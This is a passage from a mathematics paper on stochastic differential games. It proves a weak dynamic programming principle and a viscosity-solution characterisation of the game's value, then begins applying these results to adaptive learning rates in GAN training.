Here, $X^{(\nu^1,\nu^2)}_{\tau,\epsilon}$ refers to the controlled process and $\mathcal{S}$ is a set satisfying $\mathbb{S} \subset \mathcal{S} \subset \mathcal{S}_0$. For instance, one can take $\mathcal{S} = \{(\tau,\epsilon) \in \mathcal{S}_0;\,\mathbb{E}[|\epsilon|^2] < \infty \}$. In the sequel, we write $\mathcal{U}_0$ for the set $\mathcal{U}_0 = \mathcal{U}_0^1 \times \mathcal{U}_0^2$.\\
Let $f:\mathbb{R}^d \rightarrow \mathbb{R}$ be a Borel function, and the reward function $J$ be
\begin{equation}
J(t,x;\nu) = \mathbb{E}[f(X^{\nu}_{t,x}(T))], \qquad \forall (t,x)\in \mathbb{S},\forall \nu = (\nu^1,\nu^2) \in \mathcal{U}^1 \times \mathcal{U}^2,\label{Eq:reward_fct}
\end{equation}
with $\mathcal{U}^1$ (resp. $\mathcal{U}^2$) the set of admissible controls for $\nu^1$ (resp. $\nu^2$). Given $\nu^2$, we define $\mathcal{U}^{1}$ as
\begin{align*}
\mathcal{U}^{1} = \big\{ \nu^1 \in \mathcal{U}_0^1 ;\; & \mathbb{E}[|f(X^{(\nu^1,\nu^2)}_{t,x}(T))|] < \infty \big\}.
\end{align*}
Then, we denote by $\mathcal{U}^{2}$ the set
\begin{align*}
\mathcal{U}^{2} = \big\{ \nu^2 \in \mathcal{U}_0^2 :\; & \sup_{\nu^1 \in \mathcal{U}^{1}} \mathbb{E}[|f(X^{(\nu^1,\nu^2)}_{t,x}(T))|] < \infty \big\}.
\end{align*}
We write $\mathcal{U}^{1}_t$ (resp. $\mathcal{U}^{2}_t$) for the collection of processes $\nu^1 \in \mathcal{U}^{1}$ (resp. $\nu^2 \in \mathcal{U}^{2}$) that are $\mathbb{F}^t$-progressively measurable. We denote by $\mathcal{U}_t$ the set $\mathcal{U}_t = \mathcal{U}^{1}_t \times \mathcal{U}^{2}_t$. The value function $V$ of the stochastic control problem can be written as
\begin{equation*}
V(t,x) = \inf_{\nu^2 \in \mathcal{U}^{2}_t }\sup_{\nu^1 \in \mathcal{U}^{1}_t } J(t,x;\nu),\qquad \forall (t,x)\in \mathbb{S}.
\end{equation*}
\subsection{Dynamic Programming Principle for Stochastic Differential Games}
\manuallabel{subsec:dpp_ctrl_pbm}{8.2}
To establish the weak form of the dynamic programming principle, we work under the following mild assumptions, as in \citep{bouchard2011weak}.
\begin{Assumption} For all $(t,x) \in \mathbf{S}$, and $\nu \in \mathcal{U}_t$, the controlled state process satisfies
\begin{enumerate}[label= A.\arabic*, leftmargin=0.5cm]
\item \textbf{Independence.} The process $X^{\nu}_{t,x}$ is $\mathbb{F}^t$-progressively measurable.
\item \textbf{Causality.} For any $\tilde{\nu} \in \mathcal{U}_t$, $\tau \in \mathcal{T}^t_{[t,T]}$, and $ A \in \mathcal{F}^t_\tau $, if $\nu = \tilde{\nu} $ on $[t,\tau]$ and $\nu \mathbf{1}_A = \tilde{\nu} \mathbf{1}_A$ on $(\tau,T] $, then $X^{\nu}_{t,x} \mathbf{1}_A = X^{\tilde{\nu}}_{t,x} \mathbf{1}_A $.
\item \textbf{Stability under concatenation.} For every $\tilde{\nu} \in \mathcal{U}_t$, and $\theta \in \mathcal{T}^t_{[t,T]}$, we have
\begin{equation*}
\nu \mathbf{1}_{[0,\theta]} + \tilde{\nu} \mathbf{1}_{(\theta,T]} \in \mathcal{U}_t.
\end{equation*}
\item \textbf{Consistency with deterministic initial data.} For all $\theta \in \mathcal{T}^t_{[t,T]}$, we have the following:
\begin{enumerate}[label=\alph*.]
\item For $\mathbb{P}-$a.e. $\omega \in \Omega$, there exists $\tilde{\nu}_\omega \in \mathcal{U}_{\theta(\omega)}$ such that
\begin{equation*}
\mathbb{E}[f(X^{\nu}_{t,x}(T))|\mathcal{F}_\theta](\omega) = J(\theta(\omega),X^{\nu}_{t,x}(\theta)(\omega);\tilde{\nu}_\omega ).
\end{equation*}
\item For $t \leq s \leq T $, $\theta \in \mathcal{T}^t_{[t,s]}$, $\tilde{\nu} \in \mathcal{U}_s$, and $\bar{\nu}= \nu \mathbf{1}_{[0,\theta]} + \tilde{\nu} \mathbf{1}_{(\theta,T]}$, we have
\begin{equation*}
\mathbb{E}[f(X^{\bar{\nu}}_{t,x}(T))|\mathcal{F}_\theta](\omega) = J(\theta(\omega),X^{\nu}_{t,x}(\theta)(\omega);\tilde{\nu} ),\quad \text{for } \mathbb{P}-\text{a.e. } \omega \in \Omega.
\end{equation*}
\end{enumerate}
\end{enumerate}
\label{Assump:A}
\end{Assumption}
We also need the boundedness and regularity assumptions below.
\begin{Assumption} \label{Assump:B}
The value function $V$ is locally bounded.
\end{Assumption}
\begin{Assumption}\label{Assump:C}
The reward function $J(.;\nu)$ is continuous for every $\nu \in \mathcal{U}_0$.
\end{Assumption}
We are now ready to derive the weak form of dynamic programming principle.
\begin{theo} Assume Assumptions \ref{Assump:A}, \ref{Assump:B}, and \ref{Assump:C}. Then
\begin{itemize}
\item For any function $\phi$ upper-semicontinuous such that $V \geq \phi$, we have
\begin{equation}
V(t,x) \geq \inf_{\nu^2 \in \mathcal{U}^2_t}\sup_{\nu^1 \in \mathcal{U}^1_t} \mathbb{E}[\phi(\theta^\nu,X^\nu_{t,x}(\theta^\nu)].\label{Eq:Theo_DPP1_1}
\end{equation}
\item For any function $\phi$ lower-semicontinuous such that $V \leq \phi$, we have
\begin{equation}
V(t,x) \leq \inf_{\nu^2 \in \mathcal{U}^2_t} \sup_{\nu^1 \in \mathcal{U}^1_t} \mathbb{E}[ \phi(\theta^{\nu},X^\nu_{t,x}(\theta^\nu)]. \label{Eq:Theo_DPP1_2}
\end{equation}
\end{itemize}
\label{Theo:DPP1}
\end{theo}
\begin{proof} {(For Theorem \ref{Theo:DPP1}).}
Let us first prove \eqref{Eq:Theo_DPP1_1}. For any admissible process $\nu^2 \in \mathcal{U}^2_t$, define $\bar{V}$ as
\begin{equation}
\bar{V}(t,x;\nu^2) = \sup_{\nu^1 \in \mathcal{U}^1_t} J(t,x;(\nu^1,\nu^2)), \qquad \forall (t,x) \in \mathbb{S}.
\label{Eq:theo_1_eq0}
\end{equation}
Under Assumptions \ref{Assump:A}, \ref{Assump:B}, and \ref{Assump:C}, one can apply \cite[Theorem 3.5]{bouchard2011weak} to get
\begin{align*}
\bar{V}(t,x;\nu^{2}) \geq \sup_{\nu^1 \in \mathcal{U}^1_t}\,\mathbb{E}[\phi(\theta^\nu,X^{\nu}_{t,x}(\theta^\nu) ].
\numberthis \label{Eq:theo_1_eq1}
\end{align*}
Since, $V(t,x) = \inf_{\nu^2 \in \mathcal{U}^2_t}\,\bar{V}(t,x;\nu^{2})$ by definition, we use \eqref{Eq:theo_1_eq1} to deduce that
\begin{align*}
V(t,x) \geq \inf_{\nu^2 \in \mathcal{U}^2_t} \sup_{\nu^1 \in \mathcal{U}^1_t}\,\mathbb{E}[\phi(\theta^\nu,X^{\nu}_{t,x}(\theta^\nu) ].
\end{align*}
\item We move now to the proof of \eqref{Eq:Theo_DPP1_2}. Fix $\nu = (\nu^1,\nu^2) \in \mathcal{U}_t$ and set $\theta \in \mathcal{T}^t_{[t,T]}$. For any $t \geq 0$, we write $\bar{t}$ for the time $\bar{t} = t \wedge \theta(\omega)$. Let $\epsilon > 0$ and $\bar{V}$ be the function introduced in \eqref{Eq:theo_1_eq0}. Then, there is a family of $(\nu^{(s,y),\epsilon,2})_{(s,y)\in \mathbb{S}} \subset \mathcal{U}_0 $ such that
\begin{equation}
\nu^{(s,y),\epsilon,2} \in \mathcal{U}^2_{s}, \qquad J(s,y;(\nu^{s,1},\nu^{(s,y),\epsilon,2})) - \epsilon \leq \bar{V}(s,y;\nu^{(s,y),\epsilon,2}) - \epsilon \leq V(s,y), \label{Eq:theo_1_eq2}
\end{equation}
for any $(s,y) \in \mathbb{S}$ and $\nu^{s,1} \in \mathcal{U}^1_{s}$. Let $\nu^{(s,y),\epsilon} = (\nu^{1},\nu^{(s,y),\epsilon,2}) \in \mathcal{U}_{s}$. Since $\phi$ is lower-semicontinuous, and $J$ is upper-semicontinuous, there exists a family $(r_{(s,y)})_{(s,y) \in \mathbb{S}}$ of positive scalars such that
\begin{align}
\phi(s,y) - \phi(s',y') \leq \epsilon, \qquad J(s,y;\nu^{(s,y),\epsilon}) - J(s',y';\nu^{(s,x),\epsilon}) \geq -\epsilon, \quad \forall (s',y') \in B(s,y;r_{(s,y)}), \label{Eq:theo_1_eq3}
\end{align}
with $(s,y) \in \mathbb{S}$ and
\begin{equation*}
B(s,y;r) = \{(s',y')\in \mathbb{S}; \, s' \in (s-r,s],\, \|y-y'\| < r \}, \qquad \forall r > 0.
\end{equation*}
Now follow the same approach of \cite[Theorem 3.5, \emph{step} $2$]{bouchard2011weak} to construct a countable sequence $(t_i,y_i,r_i)_{i \geq 1}$ of elements of $\mathbb{S} \times \mathbb{R}$, with $0 < r_i \leq r_{(t_i,y_i)}$ for all $ i \geq 1$, such that $\mathbb{S} \subset \{0\}\times \mathbb{R}^d \cup \{\cup_{i \geq 1} B(t_i,y_i;r_i)\} $. Set $A_0 = \{T\} \times \mathbb{R}^d$, $C_{-1} = \emptyset$, and define the sequence
$$
A_{i+1} = B(t_{i+1},y_{i+1};r_{i+1})\setminus C_i, \qquad C_i = C_{i-1} \cup A_i, \quad \forall i \geq 0.
$$
With this construction, it follows from \eqref{Eq:theo_1_eq2}, \eqref{Eq:theo_1_eq3}, and the fact that $V \leq \phi$, that the countable family $(A_i)_{i \geq 0}$ satisfies
\begin{align*}
\left\{
\begin{array}{ll}
\big( \theta, X^{\nu}_{t,x} ( \theta ) \big) \in \big(\cup_{i \geq 0} A_i\big)\,\, \mathbb{P}\text{-a.s.}, & A_i \cap A_j = \emptyset, \quad \text{ for } i \ne j, \\
J(.;\nu^{i,\epsilon}) \leq \phi + 3\epsilon, & \text{ on } A_i, \text{ for } i \geq 1,
\end{array}
\right.
\numberthis \label{Eq:theo_1_eq5}
\end{align*}
with $\nu^{i,\epsilon} = \nu^{(t_i,y_i),\epsilon}$ for any $i \geq 1$. We are now ready to prove \eqref{Eq:Theo_DPP1_2}. To this end,
set $A^n = \cup_{0 \leq i \leq n} A_i$ for any $n \geq 1$ and define
\begin{equation*}
\nu^{\epsilon,n,2}_s = \mathbf{1}_{[t,\theta]}(s) \nu^2_s + \mathbf{1}_{(\theta,T]} \big( \nu^2_s \mathbf{1}_{(A^n)^c}\big(\theta,X^\nu_{t,x}(\theta)\big) + \sum_{i=1}^n \mathbf{1}_{A_i}\big(\theta,X^\nu_{t,x}(\theta)\big) \nu^{i,\epsilon,2}_s \big), \quad \forall s \in [t,T],
\end{equation*}
and $\bar{\nu}^{\epsilon,n} = (\nu^1, \nu^{\epsilon,n,2})$ for any $i \geq 1$. Note that $\{ (\theta,X^{\nu}_{t,x}(\theta)) \in A_i\} \in \mathcal{F}^t_\theta$ as a consequence of Assumption \ref{Assump:A}.1. Then, it follows from Assumption \ref{Assump:A}.3 that $\bar{\nu}^{\epsilon,n}\in \mathcal{U}_t$.
Moreover, by definition of $B(t_i,y_i;r_i)$, we have $ \theta = \bar{t}_i \leq t_i $ on $\{ (\theta,X^{\nu}_{t,x}(\theta) \in A_i\}$. Then, using Assumption \ref{Assump:A}.4, Assumption \ref{Assump:A}.2, and \eqref{Eq:theo_1_eq5}, we deduce
\begin{align*}
&\mathbb{E}[f\big(X^{\bar{\nu}^{\epsilon,n}}_{t,x}(T)\big)|\mathcal{F}_\theta ]\mathbf{1}_{A^n}\big(\theta,X^\nu_{t,x}(\theta)\big) \\
= & \mathbb{E}[ f\big(X^{\bar{\nu}^{\epsilon,n}}_{t,x}(T)\big)|\mathcal{F}_\theta ] \mathbf{1}_{A_0} \big(\theta,X^\nu_{t,x}(\theta)\big) + \sum_{i=1}^n \mathbb{E}[ f\big(X^{\bar{\nu}^{\epsilon,n}}_{t,x}(T)\big)|\mathcal{F}_{\bar{t}_i} ] \mathbf{1}_{A_i} \big(\theta,X^\nu_{t,x}(\theta)\big) \\
=& V\big(T,X^{\bar{\nu}^{\epsilon,n}}_{t,x}(T)\big) \mathbf{1}_{A_0} \big(\theta,X^\nu_{t,x}(\theta)\big) + \sum_{i=1}^n J(\bar{t}_i ,X^{\nu}_{t,x}(\bar{t}_i); \nu^{i,\epsilon}) \mathbf{1}_{A_i} \big(\theta,X^\nu_{t,x}(\theta)\big) \\
\leq &\sum_{i=0}^n \big( \phi(\theta,X^\nu_{t,x}(\theta)) + 3\epsilon \big) \mathbf{1}_{A_i} \big(\theta,X^\nu_{t,x}(\theta)\big) = \big( \phi(\theta,X^\nu_{t,x}(\theta)) + 3\epsilon \big) \mathbf{1}_{A^n} \big(\theta,X^\nu_{t,x}(\theta)\big),
\end{align*}
Using the tower property of conditional expectations, we get
\begin{align*}
\mathbb{E}\big[ f\big(X^{\bar{\nu}^{\epsilon,n}}_{t,x}(T)\big) \big] & = \mathbb{E}\big[\mathbb{E}[ f\big(X^{\bar{\nu}^{\epsilon,n}}_{t,x}(T)\big) | \mathcal{F}_{\theta}] \big]\\
& \leq \mathbb{E}\big[\big( \phi(\theta,X^\nu_{t,x}(\theta)) + 3\epsilon \big) \mathbf{1}_{A^n} \big(\theta,X^\nu_{t,x}(\theta)\big)\big] + \mathbb{E}\big[f\big(X^{\bar{\nu}^{\epsilon,n}}_{t,x}(T)\big)\mathbf{1}_{(A^n)^c} \big(\theta,X^\nu_{t,x}(\theta)\big)\big].
\end{align*}
Since $f\big(X^{\bar{\nu}^{\epsilon,n}}_{t,x}(T) \in \mathbb{L}^1$, it follows from the dominated convergence theorem
\begin{align*}
& \mathbb{E}\big[ f\big(X^{\bar{\nu}^{\epsilon,n}}_{t,x}(T)\big) \big] \\
\leq & 3\epsilon + \underset{n \rightarrow \infty}{\lim \inf}\,\mathbb{E}\big[\phi(\theta,X^\nu_{t,x}(\theta)) \mathbf{1}_{A^n} \big(\theta,X^\nu_{t,x}(\theta)\big)\big]\\
= & 3\epsilon + \underset{n \rightarrow \infty}{\lim}\,\mathbb{E}\big[\phi(\theta,X^\nu_{t,x}(\theta))^+ \mathbf{1}_{A^n} \big(\theta,X^\nu_{t,x}(\theta)\big)\big] - \underset{n \rightarrow \infty}{\lim}\,\mathbb{E}\big[\phi(\theta,X^\nu_{t,x}(\theta))^- \mathbf{1}_{A^n} \big(\theta,X^\nu_{t,x}(\theta)\big)\big]\\
= & 3\epsilon + \mathbb{E}\big[\phi(\theta,X^\nu_{t,x}(\theta))\big], \numberthis \label{Eq:theo_1_eq6}
\end{align*}
where the last inequality follows from the left-hand side of \eqref{Eq:theo_1_eq5} and from the monotone convergence theorem since either $\mathbb{E}\big[\phi(\theta,X^\nu_{t,x}(\theta))^+ \big] < \infty $ or $ \mathbb{E}\big[\phi(\theta,X^\nu_{t,x}(\theta))^-\big] < \infty$. Finally, by definition of $V$, definition of $\bar{V}$, the arbitrariness of $\nu^1$, and \eqref{Eq:theo_1_eq6}, we deduce
\begin{align*}
V(t,x) \leq \bar{V}(t,x; \nu^{\epsilon,n,2}) & = \sup_{\nu^1 \in \mathcal{U}^1_t} \mathbb{E}\big[f\big(X^{\bar{\nu}^{\epsilon,n}}_{t,x}(T)\big) \big] \leq 3 \epsilon + \sup_{\nu^1 \in \mathcal{U}^1_t} \mathbb{E}\big[\phi(\theta,X^\nu_{t,x}(\theta))\big],
\end{align*}
which completes the proof of \eqref{Eq:Theo_DPP1_2} by the arbitrariness of $\nu^2 \in \mathcal{U}^2_t$ and $\epsilon > 0$.
\end{proof}
\subsection{Stochastic Differential Games under Controlled Markov Diffusions}
\manuallabel{subsec:mkv_diff_ctrl_pbm}{5.5}
Now considering a particular class of controlled Markov dynamics, where for any control process $\nu \in \mathcal{U}_0$,
\begin{align*}
d X^\nu_t = b(t,X^\nu_t,\nu_t) dt + \tilde{\sigma}(t,X^\nu_t,\nu_t) d W_t, \numberthis \label{Eq:dynamics_x_u}
\end{align*}
with $W$ a $d$-dimensional Brownian motion, $b: \mathbb{R}_+ \times \mathbb{R}^d \times \mathbb{R}^{k^1} \times \mathbb{R}^{k^2} \rightarrow \mathbb{R}^d$ and $\tilde{\sigma}: \mathbb{R}_+ \times \mathbb{R}^d \times \mathbb{R}^{k^1} \times \mathbb{R}^{k^2} \rightarrow \mathcal{M}_{\mathbb{R}}(d)$ two continuous functions, and $\mathcal{M}_{\mathbb{R}}(d)$ the space of $d\times d$ matrices with real coefficients. Here we assume that $b$ and $\tilde{\sigma}$ satisfy the usual Lipschitz continuity conditions to ensure that Equation \eqref{Eq:dynamics_x_u} admits a unique strong solution $X^\nu_{t_0,x_0} $ such that $X^\nu_{t_0,x_0}(t_0) = x_0$ with $(t_0,x_0)\in \mathbb{S}$.
Moreover, the function $f:\mathbb{R}^d \rightarrow \mathbb{R}$ associated with the reward function $J$ in \eqref{Eq:reward_fct} is continuous, and there exists a constant $K$ such that
$$
|f(x)| \leq K \big(1 + \|x\|^2 \big), \qquad \forall x \in \mathbb{R}^d.
$$
Then we can characterize the value of the game after defining the operator $H$ as follows:
\begin{equation*}
H(t,x,p,A) = \max_{u^1 \in \mathbb{U}^1} \min_{u^2 \in \mathbb{U}^2} H^{(u^1,u^2)}(t,x,p,A), \qquad \forall (t,x,p,q) \in \mathbb{S} \times \mathbb{R}^d \times \mathcal{M}_{\mathbb{R}}(d),
\end{equation*}
with $\mathbb{U}^1$ (resp. $\mathbb{U}^2$) a closed subset of $\mathbb{R}^{k^1}$ (resp. $\mathbb{R}^{k^2}$) and
\begin{equation*}
H^{(u^1,u^2)}(t,x,p,A) = -b^\top p - \cfrac{1}{2} {\text{Tr}}[\tilde{\sigma} \tilde{\sigma}^\top A], \qquad \forall (t,x,p,q) \in \mathbb{S} \times \mathbb{R}^d \times \mathcal{M}_{\mathbb{R}}(d). \end{equation*}
\begin{prop} Assume that $V$ is locally bounded. Then
\begin{itemize}
\item $V_*$ is a viscosity supersolution of
\begin{equation}
-{V_*}_t + H(.,{V_*},{V_*}_x,{V_*}_{xx}) \geq 0, \quad \text{ on } [0,T) \times \mathbb{R}^d,
\label{Eq:prop0_supersol_visco}
\end{equation} with
$$
V_*(t,x) = \underset{(t',x') \rightarrow (t,x)}{\liminf} V(t,x).
$$
\item $V^*$ is a viscosity subsolution of
\begin{equation}
-V^*_t + H(.,V^*,V^*_x,V^*_{xx}) \leq 0, \quad \text{ on } [0,T) \times \mathbb{R}^d,\label{Eq:prop0_subsol_visco}
\end{equation}
with $$ V^*(t,x)= \underset{(t',x') \rightarrow (t,x)}{\limsup} V(t,x).$$
\item $V$ is the unique viscosity solution of
\begin{equation}
-V_t + H(.,V,V_x,V_{xx}) = 0, \quad \text{ on } [0,T) \times \mathbb{R}^d.\label{Eq:prop0_sol_visco_0}
\end{equation}
\end{itemize}
\label{prop0:Visco_sol}
\end{prop}
\begin{proof}
{(For Proposition \ref{prop0:Visco_sol}).} Let us first prove the supersolution property \eqref{Eq:prop0_supersol_visco}.
\begin{enumerate}
\item For this, assume to the contrary that there is $(t_0,x_0)\in \mathbb{S}=[0,T] \times \mathbb{R}^d$ together with a smooth function $\phi:\mathbb{S} \rightarrow \mathbb{R}$ satisfying
\begin{equation*}
0 = (V_*-\phi)(t_0,x_0) < (V_*-\phi)(t,x), \quad \forall (t,x) \in [0,T] \times \mathbb{R}^d,\quad (t,x) \ne (t_0,x_0),
\end{equation*}
such that
\begin{equation*}
\big(- \partial_t \phi + H(.,\phi,\phi_x,\phi_{xx} ) \big) (t_0,x_0) < 0.
\end{equation*}
For $\tilde{\epsilon}>0$, define $\psi$ by
\begin{equation*}
\psi(t,x) = \phi(t,x) - \tilde{\epsilon} \big( |t-t_0|^2 + \|x - x_0\|^4 \big),
\end{equation*}
and note that $\psi$ converges uniformly on compact sets to $\phi$ as $\tilde{\epsilon} \rightarrow 0$. Since $H$ is upper-semicontinuous and $(\psi,\psi_t,\psi_x,\psi_{xx})(t_0,x_0) = (\phi,\phi_t,\phi_x,\phi_{xx})(t_0,x_0)$, we can choose $\tilde{\epsilon} > 0$ small enough so that there exist $r > 0$, with $t_0 + r < T$, such that for any $u^{1} \in \mathbb{U}^1$ one can find some $\bar{u}^2 \in \mathbb{U}^2$ satisfying
\begin{equation}
\big(- \partial_t \psi + H^{(u^1,\bar{u}^2)}(.,\psi,\psi_x,\psi_{xx} ) \big) (t_0,x_0) < 0, \qquad \forall (t,x) \in B_r(t_0,x_0),
\label{Eq:prop0_eq1}
\end{equation}
with $B_r(t_0,x_0) $ the open ball of radius $r$ and center $(t_0,x_0)$. Let $(t_n,x_n)_{n\geq 1}$ be a sequence in $B_r(t_0,x_0)$ such that $\big(t_n, x_n,V(t_n,x_n)\big) \rightarrow \big(t_0, x_0,V_*(t_0,x_0)\big) $, $\nu^1 \in \mathcal{U}^1_{t_n}$, $\nu^2$ be the constant control $\nu^2 = \bar{u}^{2}$, and $\nu = (\nu^1, \nu^2)$. Now write $X^n_. = X^{\nu}_{t_n,x_n}(.) $ for the solution of \eqref{Eq:dynamics_x_u} with control $\nu$ and initial condition $X^n_{t_n} = x_n$, and consider the stopping time
\begin{equation*}
\theta_n = \inf\{ s>t_n;\, (s,X^n_s) \not\in B_r(t_0,x_0) \}.
\end{equation*}
Note that $\theta_n < T$ since $t_0 + r < T$. Using \eqref{Eq:prop0_eq1} gives
\begin{equation*}
\mathbb{E}[\int_{t_n}^{\theta_n}[- \partial_t \psi + H^u(,\psi,\psi_x,\psi_{xx} ) ](s,X^{n}_{s})\, ds] < 0.
\end{equation*}
By the arbitrariness of $\nu^1$, we get
\begin{equation}
\inf_{\nu^{2} \in \mathcal{U}^2_{t_n} } \sup_{\nu^1 \in \mathcal{U}^1_{t_n}} \, \mathbb{E}[\int_{t_n}^{\theta_n}[- \partial_t\psi + H^u(,\psi,\psi_x,\psi_{xx} ) ](s,X^{n}_{s})\, ds] < 0.
\label{Eq:prop0_eq1_1}
\end{equation}
Applying It\^{o}'s formula to $\psi$ and using \eqref{Eq:prop0_eq1_1}, we deduce that
\begin{align*}
\psi(t_n,x_n) < \inf_{\nu^{2} \in \mathcal{U}^2_{t_n} } \sup_{\nu^1 \in \mathcal{U}^1_{t_n}} \, \mathbb{E}[ \psi(\theta_n,X^{n}_{\theta_n})].
\end{align*}
Now observe that $\phi > \psi + \eta$ on $\big([0,T]\times \mathbb{R}^d\big) \setminus B_r(t_0, x_0)$ for some $\eta >0$. Hence, the above inequality implies that $\psi(t_n,x_n) < \inf_{\nu^{2} \in \mathcal{U}^2_{t_n} } \sup_{\nu^1 \in \mathcal{U}^1_{t_n}} \mathbb{E}[ \phi(\theta_n,X^{n}_{\theta_n})] - \eta$. Since $(\psi -V)(t_n, x_n) \rightarrow 0$, we can then find $n$ large enough so that
\begin{equation*}
V(t_n,x_n) < \inf_{\nu^{2} \in \mathcal{U}^2_{t_n} } \sup_{\nu^1 \in \mathcal{U}^1_{t_n}}\mathbb{E}[ \phi(\theta_n,X^{n}_{\theta_n})] - \eta/2.
\end{equation*}
Meanwhile, Theorem \ref{Theo:DPP1} ensures that
\begin{equation*}
V(t_n,x_n) \geq \inf_{\nu^{2} \in \mathcal{U}^2_{t_n} } \sup_{\nu^1 \in \mathcal{U}^1_{t_n}} \, \mathbb{E}[ \phi(\theta_n,X^{\nu}_{t_n,X_n}(\theta_n))].
\end{equation*}
which gives the required contradiction.
\item We now move to the proof of \eqref{Eq:prop0_subsol_visco}, which is similar to that of \eqref{Eq:prop0_supersol_visco}. We assume to the contrary that there is $(t_0,x_0)\in \mathbb{S}$ together with a smooth function $\phi:\mathbb{S} \rightarrow \mathbb{R}$ satisfying
\begin{equation*}
0 = (V^*-\phi)(t_0,x_0) > (V^*-\phi)(t,x), \quad \forall (t,x) \in [0,T] \times \mathbb{R}^d,\quad (t,x) \ne (t_0,x_0),
\end{equation*}
such that
\begin{equation*}
\big(- \partial_t \phi + H(.,\phi,\phi_x,\phi_{xx} ) \big) (t_0,x_0) > 0.
\end{equation*}
For $\tilde{\epsilon}>0$, define $\psi$ by
\begin{equation*}
\psi(t,x) = \phi(t,x) + \tilde{\epsilon} \big( |t-t_0|^2 + \|x - x_0\|^4 \big),
\end{equation*}
and note that $\psi$ converges uniformly on compact sets to $\phi$ as $\tilde{\epsilon} \rightarrow 0$. Since $H$ is lower-semicontinuous and $(\psi,\psi_t,\psi_x,\psi_{xx})(t_0,x_0) ) = (\phi,\phi_t,\phi_x,\phi_{xx})(t_0,x_0)$, we can choose $\tilde{\epsilon} > 0$ small enough so that there exist $r > 0$, with $t_0 + r < T$, such that for any $u^{1} \in \mathbb{U}^1$ one can find some $\bar{u}^2 \in \mathbb{U}^2$ satisfying
\begin{equation}
\big(- \partial_t \psi + H^{(u^1,\bar{u}^2)}(.,\psi,\psi_x,\psi_{xx} ) \big) (t_0,x_0) > 0, \qquad \forall (t,x) \in B_r(t_0,x_0),
\label{Eq:prop0_eq1_11}
\end{equation}
with $B_r(t_0,x_0) $ the open ball of radius $r$ and center $(t_0,x_0)$. Let $(t_n,x_n)_{n\geq 1}$ be a sequence in $B_r(t_0,x_0)$ such that $\big(t_n, x_n,V(t_n,x_n)\big) \rightarrow \big(t_0, x_0,V^*(t_0,x_0)\big) $, $\nu^1 \in \mathcal{U}^1_{t_n}$, $\nu^2$ be the constant control $\nu^2 = \bar{u}^{2}$, and $\nu = (\nu^1, \nu^2)$. Now write $X^n_. = X^{\nu}_{t_n,x_n}(.) $ for the solution of \eqref{Eq:dynamics_x_u} with control $\nu$ and initial condition $X^n_{t_n} = x_n$, and consider the stopping time
\begin{equation*}
\theta_n = \inf\{ s>t_n;\, (s,X^n_s) \not\in B_r(t_0,x_0) \}.
\end{equation*}
Note that $\theta_n < T$ since $t_0 + r < T$. Using \eqref{Eq:prop0_eq1_11} gives
\begin{equation*}
\mathbb{E}[\int_{t_n}^{\theta_n}[- \partial_t \psi + H^u(,\psi,\psi_x,\psi_{xx} ) ](s,X^{n}_{s})\, ds] > 0.
\end{equation*}
By the arbitrariness of $\nu^1$, we get
\begin{equation}
\inf_{\nu^{2} \in \mathcal{U}^2_{t_n} } \sup_{\nu^1 \in \mathcal{U}^1_{t_n}} \, \mathbb{E}[\int_{t_n}^{\theta_n}[- \partial_t\psi + H^u(,\psi,\psi_x,\psi_{xx} ) ](s,X^{n}_{s})\, ds] > 0.
\label{Eq:prop0_eq1_12}
\end{equation}
Applying It\^{o}'s formula to $\psi$ and using \eqref{Eq:prop0_eq1_12}, we deduce that
\begin{align*}
\psi(t_n,x_n) > \inf_{\nu^{2} \in \mathcal{U}^2_{t_n} } \sup_{\nu^1 \in \mathcal{U}^1_{t_n}} \, \mathbb{E}[ \psi(\theta_n,X^{n}_{\theta_n})].
\end{align*}
Now observe that $\psi > \phi + \eta$ on $\big([0,T]\times \mathbb{R}^d\big) \setminus B_r(t_0, x_0)$ for some $\eta >0$. Hence, the above inequality implies that $\psi(t_n,x_n) > \inf_{\nu^{2} \in \mathcal{U}^2_{t_n} } \sup_{\nu^1 \in \mathcal{U}^1_{t_n}} \mathbb{E}[ \phi(\theta_n,X^{n}_{\theta_n})] + \eta$. Since $(\psi -V)(t_n, x_n) \rightarrow 0$, we can then find $n$ large enough so that
\begin{equation*}
V(t_n,x_n) > \inf_{\nu^{2} \in \mathcal{U}^2_{t_n} } \sup_{\nu^1 \in \mathcal{U}^1_{t_n}}\mathbb{E}[ \phi(\theta_n,X^{n}_{\theta_n})] + \eta/2.
\end{equation*}
Meanwhile, Theorem \ref{Theo:DPP1} ensures that
\begin{equation*}
V(t_n,x_n) \leq \inf_{\nu^{2} \in \mathcal{U}^2_{t_n} } \sup_{\nu^1 \in \mathcal{U}^1_{t_n}} \, \mathbb{E}[ \phi(\theta_n,X^{\nu}_{t_n,X_n}(\theta_n))],
\end{equation*}
which gives the required contradiction.
\item Since $V_* \leq V \leq V^*$, the comparison principle in Lemma \ref{lem:comparison_principle_recall} below (see \citep{pham2009continuous}) shows that $V$ is the unique viscosity solution of \eqref{Eq:prop0_sol_visco_0} which completes the proof.
\end{enumerate}
\end{proof}
\begin{lem}[Comparision principle]
Assume the same conditions as in Proposition \ref{prop0:Visco_sol}. Let $u$ and $v$ be respectively an upper-semicontinuous viscosity subsolution and a lower-semicontinuous viscosity supersolution of \eqref{Eq:prop0_sol_visco_0} such that $u(T,.) \leq v(T,.)$ on $\mathbb{R}^d$. Then, $u \leq v$ on $[0,T) \times \mathbb{R}^d$.
\label{lem:comparison_principle_recall}
\end{lem}
\section{Analysis of Optimal Adaptive Learning Rate and Batch Size}
This section will be devoted to analyzing the optimal learning rate and batch size but also discussing their implications for GANs training.
\subsection{Optimal Learning Rate}
\manuallabel{sec:OptLearningRate}{5.1}
Note that problem \eqref{Eq:ValFunctDef} is a special case of the more general framework in Section \ref{subsec:mkv_diff_ctrl_pbm} since the dynamic of the process $q$ in \eqref{Eq:sde} is a diffusion of the same form as Equation \eqref{Eq:dynamics_x_u}. Indeed, one can simply take the variables $X_t^\nu$, $\nu$, $b$, and $\tilde{\sigma}$ in \eqref{Eq:dynamics_x_u} as
$$
\left\{
\begin{array}{ccl}
X_t^\nu = q(t), & & b(t,x,v) = \left(
\begin{array}{c}
v^w g_w(x) \\
-v^\theta g_w(x)
\end{array}
\right), \\
& & \\
\nu = u, & & \tilde{\sigma}(t,x,v) = \left(
\begin{array}{cc}
v^w \sqrt{\bar{\eta}^{w}} \sigma_w(x) & 0 \\
0 & v^\theta \sqrt{\bar{\eta}^{\theta}} \sigma_\theta(x)
\end{array}
\right),
\end{array}
\right.
$$
for any $x$ and $v = (v^w,v^\theta)$, and apply the general results of Section \ref{subsec:mkv_diff_ctrl_pbm} to analyze the optimal adaptive learning rate, assuming
